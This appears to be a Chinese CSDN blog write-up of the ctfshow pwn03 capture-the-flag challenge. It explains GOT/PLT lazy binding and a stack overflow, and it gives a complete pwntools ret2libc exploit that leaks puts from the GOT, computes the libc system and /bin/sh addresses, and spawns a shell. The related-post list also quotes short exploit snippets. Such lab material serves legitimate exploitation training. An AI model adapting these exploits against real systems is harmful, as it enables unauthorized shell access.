ctfshow pwn03

最新推荐文章于 2024-04-13 20:46:43 发布
最新推荐文章于 2024-04-13 20:46:43 发布
阅读量1.4k 收藏 1
点赞数 2
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52526329/article/details/120772235
版权

ctfshow pwn03

知识点:
全局偏移表(GOT:Global Offset Table)存放外部的函数地址
程序链接表(PLT:Procedure Link Table)存放额外代码

延迟绑定:只有动态库函数在被调用时,才会地址解析和重定位工作

plt表和got表
程序还未执行时,got表里还是plt表的地址
程序执行后,plt表里是got表的地址,got表是函数的真实地址
截图出处
截图出处

main()函数
在这里插入图片描述pwnme()
s只开辟了9个字节,而fgets函数读入了100(0x64)个字节
在这里插入图片描述存在栈溢出漏洞,但是没有system(bin/bash)地址
思路:

泄漏GOT表 ->获取远程环境的函数的真实地址->判断libc的版本->计算泄漏的函数got表的地址->计算system()函数的偏移->system()函数的真实地址
-> 计算system函数与/bin/sh的偏移->getshell

from pwn import *
context.log_level = 'debug'
elf = ELF('./stack1')
p = process('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']
payload = b"A"*13 + p32(puts_plt) + p32(main_addr) + p32(puts_got)
p.sendline(payload)
p.recvuntil('\n\n')
get_addr = u32(p.recv(4))
print(hex(get_addr))
libcbase = get_addr - 0x067360 
system_addr = libcbase + 0x03cd10
bin_sh = libcbase + 0x17b8cf
payload = flat([b'A'*13,system_addr,b'AAAA',bin_sh])
p.sendline(payload)
p.interactive()
是个笨笨
关注
专栏目录
ctfshow pwn3
qq_39980610的博客
08-19 604
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
ctfshow pwn
zip471642048的博客
06-04 533
ctfshow pwn系列
ctfshow pwn 03 全细节题解
A2247328295的博客
04-12 578
代码部分自己在写的时候也遇见了很多问题,我会给出解释,单句解释看图片,前半段的作用是通过泄露的puts函数获取该函数的真实地址给get_addr,然后去https://libc.blukat.me/查询libc版本获取后面函数的真实地址,后半部分就是常规的栈溢出,payload部分4个a占4个字节,同上为32位的程序,通常4个字节可以覆盖到返回地址部分。9个字节长的数组,但接受了100个字节的长度存在栈溢出,其实这里我们已经可推算出偏移为13了,32位的程序,通常情况加4个字节覆盖到返回地址。
CTFshow pwn03
m0_72827793的博客
05-15 749
题目:在做本道题前,我们先了解所必要的知识。
ctfshow_pwn03
Dem1的博客
05-19 4710
https://www.bilibili.com/video/av885494681 #查看libc地址 lbb 文件名
CTFshow pwn03(ret2libc-32bit
Mintind的博客
11-30 853
CTFshow-pwn03 writeup
ctfshow_pwn03 stack1
yw__y的博客
07-25 261
pwn03
2301_80627612的博客
02-26 926
延迟绑定(Lazy Binding)是动态链接器用来减少程序启动时间的一种技术。延迟绑定就是在函数第一次被调用的时候再和函数地址绑定。延迟绑定涉及到plt表和got表。
ctfshow pwn4
qq_39980610的博客
08-22 718
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow pwn7
qq_39980610的博客
08-22 573
pwn7
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5420
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
格式化字符串漏洞的两种利用姿势+orw沙盒利用
2301_79880074的博客
02-03 837
通过三道例题学习一下格式化字符串漏洞和orw(沙盒),所有例题需要附件可以私信我。
长亭PWN笔记03
kelxLZ的博客
12-28 432
什么是堆 glibc的堆管理实现 arena bins chunk malloc和free的工作流程 fastbin attack 新版本glibc中的tcache 堆的花式玩法 什么是堆 栈通常用于为函数分配固定大小的局部内存 堆是可以根据运行时的需要进行动态分配和释放的内存,大小可变 Malloc/New Free/Delete 堆的实现重点关注内存块的组织和管理方式,尤其是空闲内存块 如何提高分配和释放效率 如何降低碎片化,提高空间利用率 举例:浏览器的DOM树通常分配在堆上.
pwn3第三关
qq_18823653的博客
03-30 258
溢出点,保护都和上一关一样,这一关有外部函数system()和字符串/bin/sh, exp如下: from pwn import * elf=ELF('./pwn3') p=process('./pwn3') payload='a'*112+p32(elf.plt['system'])+p32(0x11111111)+p32(0x08048720) #0x111111是返回地址,0x080487...
CTFSHOW-PWN入门-Test_your_nc
最新发布
2402_84133101的博客
04-13 412
根据第12行代码得知,变量s1的值为CTFshowPWN,第15行代码输入变量s2的值,比较s1和s2的值,相等就执行execve_func函数。系统提示3秒后关闭,但是实际上不会,cd到根目录,在根目录上发现了flag。根据系统提示,使用输入cat /ctfshow_flag即可看到flag。system为后门函数,也看到了cat /ctfshow_flag。这题nc连接上之后没有什么发现,下载附件,使用IDA查看一番。输入CTFshowPWN,即可拿到shell,找到flag。
[pwn] 3.栈溢出
H4ppyD0g的博客
09-01 359
文章目录栈溢出原理ret2textret2shellcode 栈溢出原理 向栈中某个变量写入的数据长度超过了它预先申请的空间长度,导致超出的部分会覆盖掉栈中其他的数据,从而导致程序不按照预定的功能运行。 ret2text ret2text篡改栈帧上的返回地址为程序中已有的后门函数 题目链接:https://pan.baidu.com/s/1y-zTIm1hWkZQEeZQuemn_Q 提取码:dii9 程序代码 setbuf(stdin,0)是关闭输入缓冲区,setbuf(stdout,0)同理。 在v
canary保护和pie保护的绕过
2301_79880074的博客
01-27 2082
今天通过三道例题学习一下开启canary,pie保护的解题方法。
PWN-PRACTICE-CTFSHOW-3
P1umH0的博客
01-13 654
PWN-PRACTICE-CTFSHOW-3pwn10萌新赛-签到题萌新赛-数学99内部赛-签到题 pwn10 格式化字符串漏洞,覆写num为16即可打印出flag # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1") #gdb.attach(io,"b * 0x0
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值